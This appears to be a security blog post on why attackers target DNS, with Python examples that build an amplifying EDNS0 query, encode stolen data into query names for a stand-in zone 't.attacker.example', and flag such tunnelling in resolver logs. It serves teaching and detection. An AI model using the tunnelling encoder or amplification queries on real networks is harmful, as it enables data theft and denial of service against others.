Why would anyone want to attack DNS?

The Domain Name System (DNS) makes the Internet usable for humans. It is fundamental to the proper operation of virtually all Internet Protocol (IP) network applications, from web browsing to email, from messaging to multi-media applications and more. By its very nature, the global Internet DNS system serves as a distributed data repository containing domain names (e.g., web addresses) and corresponding IP address information. DNS has proven extremely effective and scalable in practice and most people take DNS for granted given its proven reliability. However, its essential function and decentralized architecture serve to attract attackers seeking to exploit its distributed structure and rich data store for sinister activities.

Every time you enter a web address or send an email, you use DNS. DNS translates human-readable names such as www.example.com into the numeric IP addresses that computers actually route on. This translation is more commonly referred to as name resolution, whereby a name is resolved to its IP address. A single web page may trigger many DNS lookups: its hypertext reference (href), source (src) and other attributes each name a domain, and each one prompts your browser to perform a lookup in order to fetch the referenced image, video, file or script, and perhaps to pre-fetch links. Each time you click a link to navigate to a new page, the process repeats, with successive lookups required to fully render the destination page.

Email relies on DNS for message delivery, enabling you to send email using the familiar user@destination syntax: the sending server looks up the destination domain's MX records to find its mail exchangers, then resolves those hostnames to IP addresses for transmission of the message. And DNS goes well beyond web or email address resolution. Virtually every application on your computer, tablet and smartphone, as well as security cameras, thermostats and other "things" that access the Internet, requires DNS for proper operation. Without DNS, navigating and accessing Internet applications would be all but impossible.

This leads to our first motivator for attacking DNS: to wreak havoc! An outage, or an attack that renders your DNS service unavailable or corrupts the data it returns, can effectively bring a network down from an end user perspective. Even if network connectivity exists, you won't be able to connect unless you happen to already know the IP address of the site you want, which would mark you as uniquely talented. And even then, the page's images, scripts and other linked content are referenced by name, so they would fail to load. Note that two distinct properties are at stake here: availability (the server does not answer) and integrity (it answers with the attacker's addresses, as in cache poisoning or a hijacked zone). The second is the more dangerous of the two, because users still appear to reach the site.

A second motivator for an attacker is to use DNS as an instrument in a broader attack. DNS can be queried as reconnaissance to identify potential targets: a server that has been misconfigured to permit zone transfers (AXFR) hands over an entire zone, and even without that, forward and reverse lookups enumerate hostnames whose names reveal the roles of internal machines. Just as DNS is the first step in allowing legitimate users to connect to websites, malware uses it to locate internal targets within your enterprise and external command and control (C&C) servers for updates and directives to perform nefarious tasks. Reflection or amplification is another attack form which uses DNS as an attack instrument. Because DNS normally runs over UDP, which has no handshake, an attacker can send queries to open resolvers or authoritative servers with the source address forged to be the victim's. The servers deliver their responses to the victim, and since a response can be many times larger than the query that provoked it (an ANY query with EDNS0 against a zone holding large records, for instance), a modest stream of queries becomes a large flood that denies service at the target.
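To make the size asymmetry behind amplification concrete, here is an added example (my own code for this post, not a tool from the page): it builds a wire-format DNS query carrying an EDNS0 OPT record, builds the kind of TXT-heavy response a reflector would return for it, and computes the ratio. Nothing is sent on the network; the name example.com and the record contents are constructed for illustration.

```python
"""DNS reflection/amplification: why a 40-byte UDP query can provoke a
multi-kilobyte response. Builds wire-format packets offline; nothing is sent.
All names and record contents are constructed for illustration."""
import random
import struct
from typing import List, Optional

TYPE_TXT, TYPE_ANY, TYPE_OPT = 16, 255, 41
CLASS_IN = 1


def encode_name(name: str) -> bytes:
    """RFC 1035 wire encoding: length-prefixed labels, terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(qname: str, qtype: int, edns_udp_size: int = 4096,
                txid: Optional[int] = None) -> bytes:
    """Recursive query with an EDNS0 OPT record advertising a large UDP buffer,
    which is what amplifiers send so the reflector returns the biggest response
    it can without truncating."""
    txid = random.randint(0, 0xFFFF) if txid is None else txid
    # flags 0x0100 = RD; counts: 1 question, 0 answer, 0 authority, 1 additional (OPT)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", qtype, CLASS_IN)
    # OPT pseudo-RR: root name, type 41, the "class" field carries the UDP payload size
    opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, edns_udp_size, 0, 0)
    return header + question + opt


def build_txt_response(query: bytes, txt_strings: List[bytes]) -> bytes:
    """Answer that echoes the question and returns one TXT record per string,
    emulating what a reflector sends back to whatever source address the query bore."""
    txid = struct.unpack("!H", query[:2])[0]
    # flags 0x8180 = QR + RD + RA
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(txt_strings), 0, 0)
    qname_end = query.index(b"\x00", 12) + 1          # end of the question name
    question = query[12:qname_end + 4]                 # name + qtype + qclass
    answers = b""
    for s in txt_strings:
        rdata = bytes([len(s)]) + s                    # one <character-string>, max 255 bytes
        # 0xC00C is a compression pointer to the question name at offset 12
        answers += b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 300, len(rdata)) + rdata
    return header + question + answers


def amplification_factor(query: bytes, response: bytes) -> float:
    """Bytes delivered to the (spoofed) source per byte the attacker had to send."""
    return len(response) / len(query)


if __name__ == "__main__":
    q = build_query("example.com", TYPE_ANY)
    r = build_txt_response(q, [b"x" * 255] * 10)
    print(f"query {len(q)} bytes -> response {len(r)} bytes, "
          f"x{amplification_factor(q, r):.1f}")
    # DNS over UDP has no handshake, so if the source address of q is forged
    # to be the victim's, r is delivered to the victim rather than the attacker.
```

With a 40-byte query and ten 255-byte TXT strings the factor comes out near 68x, and that is before counting the larger answers that DNSSEC-signed zones return. Open resolvers that answer queries from any source, and authoritative servers without response rate limiting, are the reflectors; for BIND that means restricting recursion with allow-recursion and, on newer releases, enabling the rate-limit option.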

The third and potentially most menacing motivator is the use of DNS as covert transport. Given its foundational necessity, DNS traffic is generally permitted to flow freely through networks, even where other outbound traffic is blocked, and attackers leverage that freedom both for name resolution on behalf of malware and for tunneling data out of the organization. The stolen data is encoded into the labels of DNS queries for a domain the attacker controls; the organization's own resolver dutifully forwards them to the attacker's tunnel endpoint, which is simply the authoritative DNS server for that domain. That "DNS server" decodes the query names, recovering the stolen information, and its responses (TXT, CNAME or NULL records, for example) can carry commands or data back in through the same channel.

Many organizations secure DNS servers as they do other network infrastructure, primarily to avert service outages per the first motivator. However, many do not take effective steps against the other two. While DNS must traverse your networks freely given its critical function, it's advisable to take a closer look at your DNS traffic to determine whether it is serving a role in attacks elsewhere or being used to export sensitive data. Resolver query logs and passive DNS capture provide an additional stream of information that can be used to identify and investigate incidents: which internal hosts resolved a known C&C domain, or which domains receive an unusual number of distinct, long subdomains. Consider adding a DNS layer to your defense in depth security approach. This DNS layer is comprised of several tactics, which I'll discuss in future posts, that can help you identify and mitigate DNS attacks.
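As an added example for the tunneling described above and for the traffic monitoring this paragraph recommends (my own code for this post, not a tool from the blog), the following encodes a payload into query names the way a DNS tunnel client does, decodes it as the attacker's authoritative endpoint would, and then applies the per-domain heuristics a resolver-log monitor can use to flag the channel. t.attacker.example is a hypothetical attacker-controlled zone, and the "resolver log" is a constructed list of query names.

```python
"""DNS as covert transport: encode a file into query names a tunnel client
would send, decode it at the tunnel endpoint, then run the per-domain
heuristics a resolver-log monitor can use to spot it. Domain names and
log entries are constructed for illustration."""
import base64
import math
from collections import defaultdict

TUNNEL_DOMAIN = "t.attacker.example"   # hypothetical attacker-controlled zone
MAX_LABEL, MAX_NAME = 63, 253          # RFC 1035 limits


def encode_exfil(data: bytes, domain: str, labels_per_name: int = 3) -> list:
    """Base32 keeps names valid and survives case folding by resolvers; labels are
    capped at 63 bytes and a leading sequence label lets the endpoint reorder queries."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    per_name = MAX_LABEL * labels_per_name
    names = []
    for seq, i in enumerate(range(0, len(b32), per_name)):
        piece = b32[i:i + per_name]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        name = f"{seq}." + ".".join(labels) + "." + domain
        if len(name) > MAX_NAME:
            raise ValueError("name too long; reduce labels_per_name")
        names.append(name)
    return names


def decode_exfil(names, domain: str) -> bytes:
    """What the attacker's 'authoritative server' does with the queries it receives."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                                   # unrelated traffic
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))   # restore padding


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(name: str) -> str:
    """Last two labels; a production monitor should use the Public Suffix List."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def flag_tunnel_domains(query_names, min_unique=20, min_sub_len=40, min_entropy=3.5) -> dict:
    """Many distinct, long, high-entropy subdomains under one registered domain is the
    signature of data riding in query names; benign traffic reuses a few short names."""
    per_domain = defaultdict(lambda: {"uniq": set(), "lens": [], "ents": []})
    for q in query_names:
        rd = registered_domain(q)
        sub = q[: -len(rd) - 1] if len(q) > len(rd) else ""
        st = per_domain[rd]
        st["uniq"].add(q)
        st["lens"].append(len(sub))
        st["ents"].append(shannon_entropy(sub.replace(".", "")))
    flagged = {}
    for rd, st in per_domain.items():
        mean_len = sum(st["lens"]) / len(st["lens"])
        mean_ent = sum(st["ents"]) / len(st["ents"])
        if len(st["uniq"]) >= min_unique and mean_len >= min_sub_len and mean_ent >= min_entropy:
            flagged[rd] = {"unique": len(st["uniq"]),
                           "mean_len": round(mean_len, 1),
                           "mean_entropy": round(mean_ent, 2)}
    return flagged


# Constructed resolver log: ordinary browsing mixed with one tunnelled 3 KB file.
SECRET = bytes(range(256)) * 12
BENIGN = ["www.example.com", "mail.example.com", "cdn1.example.net", "api.example.net"] * 50
SAMPLE_QUERIES = BENIGN + encode_exfil(SECRET, TUNNEL_DOMAIN)

if __name__ == "__main__":
    assert decode_exfil(SAMPLE_QUERIES, TUNNEL_DOMAIN) == SECRET
    for rd, st in flag_tunnel_domains(SAMPLE_QUERIES).items():
        print(rd, st)
```

The thresholds are starting points, not universal constants: CDNs and some anti-spam lookups also generate long machine-made subdomains, so tune against your own baseline and pair this with the other obvious signals, such as a single internal host producing a steady stream of queries for one otherwise-unknown domain, or TXT and NULL responses that are far larger than ordinary answers.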
